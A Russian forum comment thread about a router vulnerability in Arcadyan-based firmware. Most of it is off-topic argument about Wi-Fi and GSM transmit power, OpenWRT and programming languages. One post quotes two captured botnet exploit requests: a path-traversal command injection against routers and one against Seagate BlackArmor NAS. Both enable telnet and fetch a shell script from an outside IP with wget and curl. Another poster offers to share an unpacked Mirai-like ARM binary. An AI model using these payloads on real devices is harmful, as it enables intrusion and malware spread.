Как я понимаю, после кончины сервака - выводку вроде бы хана. Он вроде и распостранитель и cnc. Не думаю что оно умеет на лету патчить айпишники внутри бинарей, тем более что они жаты UPX, как минимум ARM7 и x86_64. В первом приближении бинарь периодически качал вон то же трололо которым делал начальный даунлоад, и запускал, оно умеет и старый бинарь выпиливать, качая новый. Айпишники в бинаре и скрипте прибиты на гвозди. И если сервак умер - ну, оно тогда вроде в пролете должно оказаться, новое трололо скачать уже не сможет.

Но если тебе это надо, у меня ARM7 версия кажется сохранилась. Могу налить, правда, я распаковал. Обстрипать забыли походу, так что вдвое жирнее х86_64 (для ARM нехарактерно). Зато все адреса символов на месте, если кому делать нехрен с дизассемблером... но я не уверен что оно того стоит.

Если этот экземпляр нужен, ну, могу залить куда-нибудь. Для мипса нету, я его не качал.

Ответить | Правка | Наверх | Cообщить модератору

315. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от пох. (?), 11-Авг-21, 17:18 
ну выложи куда-нибудь в яндексдиск (как обычно - рар с паролем,а то знаем мы эту заботу о безопастносте котиков)

> Обстрипать забыли походу,

вовово, так я и думал. Возможно что интересное внутри найдем.

Ответить | Правка | Наверх | Cообщить модератору

279. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Michael Shigorinemail (ok), 11-Авг-21, 01:03 
>> Mirai это вроде по-японски "будущее" ?
> Ну да. И к тому были причины. Примерно такие:

*yaawn*

Ответить | Правка | К родителю #158 | Наверх | Cообщить модератору

17. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +7 +/
Сообщение от Аноним (52), 09-Авг-21, 11:52 
OpenWRT без Luci попробуйте оприходовать. Самое смешное что как-то пытались протолкнуть идею о запрете перепрошивки роутера. Теперь понятно зачем. В сэшэакии так уже запретили. Мы как всегда отстали от самых демократичных к роутерам демократам.
Ответить | Правка | Наверх | Cообщить модератору

19. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –3 +/
Сообщение от Аноним (13), 09-Авг-21, 11:56 
Там запретили программно менять параметры радиотакта (т.е. модифицировать устройство для вещания на не разрешённых частотах), а не прямо вот так, чтобы полностью прошивку заменять.
Ответить | Правка | Наверх | Cообщить модератору

23. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Аноним (62), 09-Авг-21, 12:07 
Самое забавное что у нас вещать не неразрешенных частотах тоже запрещено, но до роутеров в явном виде еще не добравлись.
Ответить | Правка | Наверх | Cообщить модератору

45. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (52), 09-Авг-21, 13:04 
Интересно ноутбук будет считаться роутером? А если там есть esim? А если по USB поключен хаб и интернет идет через него? А клавиатурная версия Рпи4 тоже роутер потому что у него есть лан порт? Смартфон это роутер когда тетерит?
Ответить | Правка | Наверх | Cообщить модератору

69. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (62), 09-Авг-21, 14:01 
На изучай https://certificate.moscow/%D0%93%D0%BB&... коротка да, но есть нюансы.
Ответить | Правка | Наверх | Cообщить модератору

83. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Аноним (291), 09-Авг-21, 14:32 
> Интересно ноутбук будет считаться роутером? А если там есть esim? А если по USB поключен хаб и интернет идет через него? А клавиатурная версия Рпи4 тоже роутер потому что у него есть лан порт? Смартфон это роутер когда тетерит?

Ни ноут, ни смартфон точно не выдадут такую ЭИИМ, чтобы нарушить нормативы РКН.
У них скорее чипы сгорят от слишком высокого КСВН в антенном тракте.

Ответить | Правка | К родителю #45 | Наверх | Cообщить модератору

98. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –3 +/
Сообщение от Аноним (52), 09-Авг-21, 15:06 
Ну вообще-то в смартфонах есть контакт для подключения антенны как на роутере. И собственно никто не мешает воткнуть большую такую антенну в смарфтон и на малой мощности получить предельно разрешенную мощность сигнала. То что в смарфтоне может исполнять роль антенны проволочка, то это еще не значит, что плата больше никак не может быть использована. Но мощность сигнала почему-то меряется в миллиамперах. А то что вместо антенн на 6 децибелл человек может поставить 18 дб это в голову не приходит?
Ответить | Правка | Наверх | Cообщить модератору

110. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +2 +/
Сообщение от Аноним (291), 09-Авг-21, 15:58 
О да, волшебная антенна спасет отца русской демократии.
В том числе и от ограничений РКН, потому что для узконаправленной передачи нормативы совсем другие.

Или вы думаете, что в "хорошую" антенну можно закачать 1 dBm, а на выходе получить 1 dBW сразу во все стороны?

> Но мощность сигнала почему-то меряется в миллиамперах.
> Мощность
> миллиамперах

А, ну да, понятно.

Ответить | Правка | Наверх | Cообщить модератору

116. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Аноним (52), 09-Авг-21, 16:56 
Ну погляди в настройках роутера. Там есть от 10 до 100 миллиампер настройка. То что есть антенны на 3, 5, 6 децибелл прошивка не учитывает. Мощность сигнала меняется. Учи физику. Если ты про децибеллы, то он нелинейно скалируются чтобы на них смотреть, а потому не интересны. Разрешено подавать 100ма подавать, значит на автомате роутер сам выберет сколько надо затратить энергии в один момент времени чтобы передать данные. Настроек связанных с установкой диапазона с учетом требований РКН там увы и ах не завезли.
Ответить | Правка | Наверх | Cообщить модератору

124. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +3 +/
Сообщение от Аноним (291), 09-Авг-21, 17:11 
Измеряете мощность в миллиамперах, но советуете другим учить учить физику.
Typical opennet.
Ответить | Правка | Наверх | Cообщить модератору

160. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 18:54 
> Измеряете мощность в миллиамперах, но советуете другим учить учить физику.
> Typical opennet.

Фига ламо, -dBm миллиамперами назвать. А что там роутер решит - отдельный вопрос. Это может быть либо максимум, либо фиксированое значение.

И так то вон тот *-линк ничтоже сомневаясь себе +27dBm так то разрешил, вертев всех этих надзоров с FCC на антеннах во имя дальнобойности, при том такая наглость прямо в фабричной прошивке. OpenWRT еще патчить надо чтобы себе такое разрешить, он так на regulatory забить искаропки не даст :)

Ответить | Правка | Наверх | Cообщить модератору

209. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (52), 09-Авг-21, 22:22 
Кто про мощность сигнала, а кто про затраты при передаче на расстоянии. У вас мощность наверное только одна. Одна страна, одна нация, одна мощность.
Ответить | Правка | К родителю #124 | Наверх | Cообщить модератору

181. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (181), 09-Авг-21, 20:50 
Аха-ха-ха!!! :D Бриллиант, в анналы. Такого фееричного бреда я ещё не видел. И это "Учи физику", а-ха-ха!!! Альтернативная физика из альтернативных миров от альтернативно одарённого. Мощность у него не в миливаттах, а в миллиамперах, а уровень излучения антенны не в соотношении децибел на миливатт dBm, а внезапно в децибеллах dB !!! А ещё в его роутере уже есть искусственный интеллект, который САМ выбирает, сколько ему надо мощности и скоро захватит мир. Убить всех человеков!! :))))
Ответить | Правка | К родителю #116 | Наверх | Cообщить модератору

186. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Атон (?), 09-Авг-21, 21:06 
> А ещё в его роутере уже есть искусственный интеллект, который САМ выбирает, сколько ему надо мощности

Внезапно да.
beamforming в роутере для ближних клиентов снижает мощность передачи, так что да - интеллект, выбирает.

Ответить | Правка | Наверх | Cообщить модератору

190. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (181), 09-Авг-21, 21:10 
> Внезапно да.
> beamforming в роутере для ближних клиентов снижает мощность передачи, так что да
> - интеллект, выбирает.

Я понимаю, что ты пытаешься найти рац.зерно в бреде. Но ты же понимаешь, что чудак что-то где-то по верхам в wiki прочитал, мало что понял и теперь пафосно учит людей.

Ответить | Правка | Наверх | Cообщить модератору

199. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Атон (?), 09-Авг-21, 21:27 
>> Внезапно да.
>> beamforming в роутере для ближних клиентов снижает мощность передачи, так что да
>> - интеллект, выбирает.
> Я понимаю, что ты пытаешься найти рац.зерно в бреде. Но ты же
> понимаешь, что чудак что-то где-то по верхам в wiki прочитал, мало
> что понял и теперь пафосно учит людей.

но теперь то он прочтет и поймет.  
умнее станет.
считай ВУЗ за вечер закончил.


как думаешь, сразу рассказать ему что "настройки связанные с установкой диапазона с учетом требований" _ГКРЧ_ там "завезли" и они железно прошиты в firmware, или оставить на завтра?

Ответить | Правка | Наверх | Cообщить модератору

215. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (181), 09-Авг-21, 23:12 
> но теперь то он прочтет и поймет.

...
> как думаешь, сразу рассказать ему что... или оставить на завтра?

Чудак надменно выдаёт "учи физику", с таким отношением сомнительно.


Ответить | Правка | Наверх | Cообщить модератору

192. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 21:13 
Beamforming по определению - "формирует лучи".  Ну то-есть координирует несколько передатчиков и фазировку сигнала так, чтобы излучение больше летело в сторону вон того клиента и меньше - в противоположную. Регулировка уровня сигнала - это другая фича.
Ответить | Правка | К родителю #186 | Наверх | Cообщить модератору

195. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Атон (?), 09-Авг-21, 21:21 
> Регулировка уровня сигнала - это другая фича.

это (не важная) часть бимформинга. потому что мир зохватили экоактивисты, греты тундрыберги и прочие зеленописьи.

снижение излучаемой мощности = снижение потребляемой = снижение выбросов цэо2

Ответить | Правка | Наверх | Cообщить модератору

200. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 21:33 
Для тех кто в танке еще раз: beam forming и power management разные фичи.

Продвинутая версия, для тех чей IQ все же за 90: конская мощность передатчика создает искажения в его же собственном усилителе мощности, портя сигнал и ухучшая скорость. Равно как может перегрузить ломовым сигналом приемник адресата, с тем же результатом. Так что если некий клиент сидит верхом на роутере, может иметь смысл снизить мощность в его адрес. Это повысит скорость в конечном итоге. Для тех кто что-то слышал про CS и каналы, это улучшает SNR.

Регулировка TX power и beam forming - тупо разные фичи. На уровне стандарта. Но вы можете заспорить с форумом стандартизации вайфая, конечно, доказав им что они адепты Греты и вообще это заговор. Хотя так то жрущий электричество почем зря роутер еще и денег в содержании стоит, немного, но за несколько лет уже ощутимее.

Ответить | Правка | Наверх | Cообщить модератору

204. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Атон (?), 09-Авг-21, 21:39 
> Для тех кто в танке еще раз: beam forming и power management
> разные фичи.
> Продвинутая версия, для тех чей IQ все же за 90: конская мощность
> передатчика создает искажения в его же собственном усилителе мощности, портя сигнал
> и ухучшая скорость. Равно как может перегрузить ломовым сигналом приемник адресата,
> с тем же результатом.

молодец!
грокаешь!

Ответить | Правка | К родителю #200 | Наверх | Cообщить модератору

280. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Michael Shigorinemail (ok), 11-Авг-21, 01:08 
> Продвинутая версия, для тех чей IQ все же за 90: конская мощность
> передатчика создает искажения в его же собственном усилителе мощности,
> портя сигнал и ухучшая скорость. Равно как может перегрузить ломовым
> сигналом приемник адресата, с тем же результатом.

Уважаемый Юзер, для тех, кому "за 10", может оказаться очевидной другая штука: если мощность передатчика * чувствительность приёмника в одну сторону сильно отличается от другой, с двусторонней связью можно начинать прощаться.

Вам это в голову часом не приходило?

Ответить | Правка | К родителю #200 | Наверх | Cообщить модератору

307. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 11-Авг-21, 14:22 
> Вам это в голову часом не приходило?

1. Если посмотреть другие сообщения, я немного догадываюсь.
2. Интересная штука насчет радиоволн. Это как в оптике. Вы можете кидать луч с одной стороны линзы. Или другой. Это не влияет на путь лучей. Антенны одинаковы на прием и передачу.

Поэтому если оно на прием умеет суммировать сигнал с всех антенн сдвигая фазы, по идее, появится "предпочитаемое направление", как на передачу, с усилением оттуда больше чем у 1 антенны. И тогда эффект может быть с 2-сторонним выигрышем.


Disclaimer: я не SDRщик или спец по радиолинкам, могу приврать. Но вроде должно быть так.

Ответить | Правка | К родителю #280 | Наверх | Cообщить модератору

159. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 18:50 
> Ни ноут, ни смартфон точно не выдадут такую ЭИИМ, чтобы нарушить нормативы РКН.

Вообще, телефон сам по себе умеет 2 ватта (+30dBm) в эфир долбить, как минимум в режиме GSM. Что довольно неплохо для такой мелочи так то.

И кстати да, если с антенной что-то не так, дырка в чипе иногда случается...

Ответить | Правка | К родителю #83 | Наверх | Cообщить модератору

191. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Атон (?), 09-Авг-21, 21:11 
> телефон сам по себе умеет 2 ватта (+30dBm) в эфир долбить, как минимум в режиме GSM

Если ты найдешь телефон середины 90х, то да, он тебе в ухо 2 Вт надует.
Но давно уже нет ТЕХ сетей GSM. БС натыканы так часто, что подвижным терминалам нет необходимости _уметь_ излучать 2Вт.

Ответить | Правка | Наверх | Cообщить модератору

196. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 21:21 
> Если ты найдешь телефон середины 90х, то да, он тебе в ухо 2 Вт надует.

И почти любой GSM-compatible. Секрет в том что 2 ватта - в импульсе. Но это 1/8 времени. Большинство модемов и телефонов особенно не напрягается столько сплюнуть.

> Но давно уже нет ТЕХ сетей GSM. БС натыканы так часто, что
> подвижным терминалам нет необходимости _уметь_ излучать 2Вт.

Наверное именно поэтому в параметрах всяких модулей и модемов заявлены конские токи в момент передачи, ага. Так то если телефон отваливается на границе покрытия - это ему в плюс еще никогда не шло.

"Нет необходимости"? Попробуй хоть в дефолтсити за мкад высунуться. Там иной раз 2G едва доползает. 3G и выше - короткодействующие очень, соты в малонаселенной местности тыкать накладно, а мир не заканчивается твоим офисом и домом. Есть хренова куча мест куда даже 2G не добивает. Потому что ставить вышку в селе с тремя бабками - не особо выгодное начинание. Она и стоит одна на цать километров, а кому там вообще долетит - а как повезет.

Ответить | Правка | Наверх | Cообщить модератору

202. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Атон (?), 09-Авг-21, 21:37 
> Есть хренова куча мест куда даже 2G не добивает. Потому что ставить вышку в селе с тремя бабками - не особо выгодное начинание. Она и стоит одна на цать километров, а кому там вообще долетит - а как повезет.

Да, вот только увеличение мощности ну никак не поможет "долететь".

В GSM 2Вт это для соты двойной дальности радиусом 70 км.

прямой видимости.

спустился за гору, попал в радиотень - ты без связи.

с любой мощностью.

Ответить | Правка | Наверх | Cообщить модератору

207. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Аноним (-), 09-Авг-21, 21:50 
> Да, вот только увеличение мощности ну никак не поможет "долететь".

Очень даже поможет. У мобилы не ахти какая антенна и выловить дохлый сигнал, да еще чего доброго ослабленый руками и проч - приемник на соте что, волшебный? Линк 2-сторонняя штука, если сота вас не слышит - вас не существует. Это же верно и в обратную сторону, если вы не слышите соту, хренли толку с того что вы до нее дострелили? Но приемники у большинства чипсетов сейчас довольно приличные.

> В GSM 2Вт это для соты двойной дальности радиусом 70 км.

Что там было про нахватался по верхам? Это вот оно. Так то 70 км это соты половинной емкости, с 4 таймслота вместо 8. Про мощности там ничего не говорится, это времянки протокола. На расстоянии больше 35 км задержка достаточна для того чтобы клиент начал попадать в чужой таймслот. Но если его не выделять никому и отдать этому клиенту - то оно будет работать, профакав половину емкости соты.

А у соты передатчик ваттов под 20 бывает, если не больше - его услышать попроще чем 2-ваттный на том же расстоянии.

> прямой видимости.
> спустился за гору, попал в радиотень - ты без связи.
> с любой мощностью.

Этот мир не настолько простой и идеальный. А радиоволны не зря считают чем-то типа черной магии.

Ответить | Правка | Наверх | Cообщить модератору

208. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Атон (?), 09-Авг-21, 22:01 
> Что там было про нахватался по верхам? Это вот оно

Не стесняйся признаваться.

> Так то 70 км это соты половинной емкости, с 4 таймслота вместо 8.

Ты конечно правильно говоришь, но про слоты речи вообще не было. только про мощность.  
про слоты мы поговорим в следующий раз.


В соте "нормального" размера gsm терминал работал излучая ОДИН Вт.  

> А у соты передатчик ваттов под 20 бывает, если не больше - его услышать попроще чем 2-ваттный на том же расстоянии.

пофигу как терминал слышит соту, важно как сота слышит его.  

> А радиоволны не зря считают чем-то типа черной магии.

"Чем то"? Чистая незамутненная Чорная магия и есть.  

Ответить | Правка | Наверх | Cообщить модератору

241. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 10-Авг-21, 11:48 
> Не стесняйся признаваться.

RTFMнуть соответствующие ETSI clauses и даташиты на модули реализующие это - наверное, все же, не совсем по верхам? Или был способ лучше? А, наверное надо ламерствовать на форуме с умным видом, как некоторые, считая что это лучше RTFM-а.

> Ты конечно правильно говоришь, но про слоты речи вообще не было. только про мощность.

Так я не виноват что ты не в теме чем "дальнобойная" БС GSM половинной емкости прежде всего отличается.

> про слоты мы поговорим в следующий раз.

Когда ты прочитаешь доки ETSI? КМК, это будет не очень скоро, они довольно жирные :)

> В соте "нормального" размера gsm терминал работал излучая ОДИН Вт.

Вообще-то два (или, точнее, до двух, по согласованию с БС и возможностям железа). А разница в том 1/4 или 1/8 времени слота это будет происходить.

Если кто хочет про среднюю (за слот) мощность поговорить, тогда это 2W/4 = 0.5W а 2W/8 = 0.25W. Но это два ватта импульс, потом пауза. И облом состоит в том, что когда вы дизайните систему с этим самым, этот ломовой импульс измеряемый амперами надлежит удержать без просадок напряжения. Это довольно challenging момент в дизайне таких систем. Попробуйте догадаться, откуда я об этом узнал, мистер умник ;)

> пофигу как терминал слышит соту, важно как сота слышит его.

Линк двухсторонний. Отпадет одна сторона - отпадет весь линк.

> "Чем то"? Чистая незамутненная Чорная магия и есть.

Она поддается объяснению. И все же даже ультра про с дорогими тулами редко могут угадать с 1 попытки.

Ответить | Правка | Наверх | Cообщить модератору

282. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Michael Shigorinemail (ok), 11-Авг-21, 01:11 
> Или был способ лучше?

gsmforum, не?

Ответить | Правка | Наверх | Cообщить модератору

308. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 11-Авг-21, 14:46 
> gsmforum, не?

Не знаю. Стандартизатор GSM/3G/... если что ETSI называется, самые полные доки там. Они их отгружают бесплатно, но может с регистрацией. Но это сложные доки, по ним OSMOCOM как я понимаю с ноля написали весь стэк.

Ответить | Правка | К родителю #282 | Наверх | Cообщить модератору

281. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Michael Shigorinemail (ok), 11-Авг-21, 01:10 
> 3G и выше - короткодействующие очень, соты в малонаселенной местности
> тыкать накладно

То-то на Киев лет десять назад приходилось _две_, что ли, БС-ки CDMA и уж не знаю какая гора GSM900/1800.

Ответить | Правка | К родителю #196 | Наверх | Cообщить модератору

310. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 11-Авг-21, 14:52 
Если вы хотели поспорить, то вон то - результат натурных экспериментов в всяких пердях. При напрягах с условиями, GSM умирает позже 3G/HSPA/4G/... и субъективно чем при удалании от одинокой соты примерно так выглядит: 4G -> HSPA -> 3G -> GPRS (он GSM).
Ответить | Правка | Наверх | Cообщить модератору

55. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от Аноним (52), 09-Авг-21, 13:14 
В настройках OpenWRT заходишь и ставишь любой регион. Хочешь Китай будет. Вещать может будет на разрешенной частоте, но например сильнее в 2 раза. Подумаешь стены у тебя в доме толстые. Чего теперь страдать что-ли?
Ответить | Правка | К родителю #19 | Наверх | Cообщить модератору

75. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –4 +/
Сообщение от Аноним (291), 09-Авг-21, 14:14 
Именно поэтому OpenWRT в цивилизованных странах вытесняется проприетарными решениями.
Ответить | Правка | Наверх | Cообщить модератору

106. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –3 +/
Сообщение от Аноним (52), 09-Авг-21, 15:47 
А пофигу. Я вот китайский Xiaomi R3 Pro предпочту даже wifi6 ибо все равно более 200 устройств не выжрут более гигабита. А дурачки будут покупать штеудский вафлемодуль, чтобы не иметь возможности раздавать интернет с ноутбука, который пойдет по проводу через смартфон. Очень круто дэа, у меня на ath9k будет работать любая функция. Хочешь в режиме монитора - пожалуйста. Хочешь без закрытой фирмвари от штеуда? - На здоровье. 3 канала в 5 ггц то всяко хватает. OpenWRT же явлется базой на которой и строятся прошивки в Xiaomi. А потому уйти от проприетарного клона это нормально.
Ответить | Правка | Наверх | Cообщить модератору

111. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –6 +/
Сообщение от Аноним (291), 09-Авг-21, 16:03 
> А пофигу. Я вот китайский Xiaomi R3 Pro предпочту

Что вы, это же тоталитарный Китай! Оттуда ночью ночью вылезет Винни-Пух и подло обесчестит вас!

Huawei, Xiaomi - в цивилизованных странах absolutely no-go, покупая их, вы совершаете преступление против демокраси!

Ответить | Правка | Наверх | Cообщить модератору

119. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –3 +/
Сообщение от Аноним (52), 09-Авг-21, 17:03 
Вот уж о ком я подумаю в последнюю очередь это демосраты. Был выбор среди soho роутеров, и от кинетика аналогичное железо, но с 256 мегабайтами памяти стоило в 2 раза дороже почему-то. Да и ненужна прошивка от кинетика когда в OpenWRT можно запихнуть что угодно. Неконкурентноспособны роутеры сторонних производителей против серого импорта того, что сделано для внутреннего рынка Китая и просто не имеет русского языка в прошивке. Ну разве что SFP порт воткнут в ту же цену, это я одобрил бы. Но есть простые устройства для переделки оптического сигнала в обычные сигналы RJ45 а потому SFP порт нужен в основном людям у кого дом где-нибудь в пригороде. Редко в общем полезно бывает, но и это не киллер фича.
Ответить | Правка | Наверх | Cообщить модератору

167. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 19:23 
> Huawei, Xiaomi -

Только потом трафик еще не забыть поснифать, куда он там такой хороший ломится. Как минимум телефоны этих фирм занимаются проституцией за двоих: сливают и гуглу и на какие-то свои узкоглазые сервера.

Ответить | Правка | К родителю #111 | Наверх | Cообщить модератору

283. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Michael Shigorinemail (ok), 11-Авг-21, 01:12 
> Именно поэтому OpenWRT в цивилизованных странах

А можно пример цивилизованной страны по Вашей версии?
Хоть новости оттуда почитаю, порадуюсь.
Как тот доктор из бородатого анекдота.

> вытесняется проприетарными решениями.

Ответить | Правка | К родителю #75 | Наверх | Cообщить модератору

68. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (291), 09-Авг-21, 14:00 
> Там запретили программно менять параметры радиотакта (т.е. модифицировать устройство для вещания на не разрешённых частотах), а не прямо вот так, чтобы полностью прошивку заменять.

Под предлогом первого запретили именно второе.

Ответить | Правка | К родителю #19 | Наверх | Cообщить модератору

165. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 19:20 
> OpenWRT без Luci попробуйте оприходовать.

Я так и делал. Сохранил как-то конфиг радио и проч а потом вкатывал его. Чтоб вебфейс не ставить. Так то потом по мелочи через uci можно подрихтовать параметры.

Ответить | Правка | К родителю #17 | Наверх | Cообщить модератору

20. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +2 +/
Сообщение от Админ Анонимов (?), 09-Авг-21, 11:58 
а http-сервера от компании Arcadyan случайно не на С или С++ написан ?
Ответить | Правка | Наверх | Cообщить модератору

21. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Плюсовик (?), 09-Авг-21, 12:03 
Ты тип ошибки видел? Подобное можно написать на всех существующих и будущих языках программирования.
Ответить | Правка | Наверх | Cообщить модератору

28. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +3 +/
Сообщение от Админ Анонимов (?), 09-Авг-21, 12:17 
так ты хочешь сказать что это были рукожопые сишники ?
Ответить | Правка | Наверх | Cообщить модератору

50. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Плюсовик (?), 09-Авг-21, 13:08 
Ты видел ошибку?

Это логическая ошибка никак не связана с языком. Подобное я часто видел в самописных парсерах на разных языках.

Ответить | Правка | Наверх | Cообщить модератору

56. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Админ Анонимов (?), 09-Авг-21, 13:17 
бл9, народ, вы вопрос читать умеете ? спросил на каком языке написан http-сервер от Arcadyan - C/С++ или какой-то другой ? а в ответ слышно всё что угодно но не ответ на вопрос, тут вообще адекватные есть ?
Ответить | Правка | Наверх | Cообщить модератору

59. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Урри (ok), 09-Авг-21, 13:33 
Адекватные тут бывают, изредка, причем всегда новички.
А как с нами в палате потусуются, так и крыша, того.

Но мы все же лучше тех, из соседнего корпуса, которые совсем молодые и сюда регулярно пообщаться бегают.

Ответить | Правка | Наверх | Cообщить модератору

58. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от another_one (ok), 09-Авг-21, 13:28 
Странно, в соседней новости поливают модные языки за логические ошибки. Но, вы не понимаете, это ДРУГОЕ!
Ответить | Правка | К родителю #50 | Наверх | Cообщить модератору

77. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (291), 09-Авг-21, 14:18 
К языку Си неприменимо понятие "логическая ошибка".
Ответить | Правка | Наверх | Cообщить модератору

122. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Аноним (52), 09-Авг-21, 17:09 
Правильно, потому что Си делает именно то, чего люди написали. Скажу компу считать первые три цифры числа пи после запятой и вываливать это в терминал - будет комп постоянно заниматься именно этим. Чукча не писатель. А потому комп просто делает то что от него требуют.
Ответить | Правка | Наверх | Cообщить модератору

125. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (291), 09-Авг-21, 17:14 
Главная проблема Си - люди пишут на нём не совсем то, что нужно сделать.

Почему-то.

Ответить | Правка | Наверх | Cообщить модератору

201. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 21:35 
> Главная проблема Си - люди пишут на нём не совсем то, что нужно сделать.

Да вообще-то люди это делают на всех ЯП. Ну, может, кроме брефнфака - на нем за@#%ваются и не делают :)

> Почему-то.

Ответить | Правка | Наверх | Cообщить модератору

29. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –4 +/
Сообщение от Урри (ok), 09-Авг-21, 12:19 
На всех, кроме Раст!!11

Ответить | Правка | К родителю #21 | Наверх | Cообщить модератору

35. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от onanim (?), 09-Авг-21, 12:42 
на Rust, обрабатывает PHP скрипты по протоколу CGI.

вот эксплоит:

POST /images/..%2fapply_abstract.cgi HTTP/1.1
Connection: close
User-Agent: Dark

action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0AARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp;wget+http://212.192.241.72/lolol.sh;curl+-O+http://212.192.241.72...


там кстати ещё один встроен, для Seagate BlackArmor NAS:

GET /backupmgt/localJob.php?session=fail;cd+/tmp;wget+http://212.192.241.72/lolol.sh;curl+-O+http://212.192.241.72... HTTP/1.1
Connection: close
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Dark

Ответить | Правка | К родителю #20 | Наверх | Cообщить модератору

36. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от onanim (?), 09-Авг-21, 12:43 
блин, опеннет похерил разметку и обрезал длинную строку.
сами найдёте, кому надо.
Ответить | Правка | Наверх | Cообщить модератору

51. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Админ Анонимов (?), 09-Авг-21, 13:10 
>на Rust

так а где это посмотреть на чем написана реализация http-сервера от Arcadyan ?
я просто предположил что это C/C++ но не уверен и поэтому спросил у сообщества, но в ответ получил какие-то говновыхлопы

Ответить | Правка | К родителю #35 | Наверх | Cообщить модератору

37. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Абвгдейка (?), 09-Авг-21, 12:45 
Да,случайно.
Два Си разраба начали писать на игого и растишке, но во время писанины отвлеклись на разговор и по окончании беседы обнаружили, что 99% кода написали на Си.
Долго они потом смеялись над этой историей, да и само требование начальника чтобы был код на игого и растишке оказалось соблюдено.
Ответить | Правка | К родителю #20 | Наверх | Cообщить модератору

24. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от criconemail (?), 09-Авг-21, 12:07 
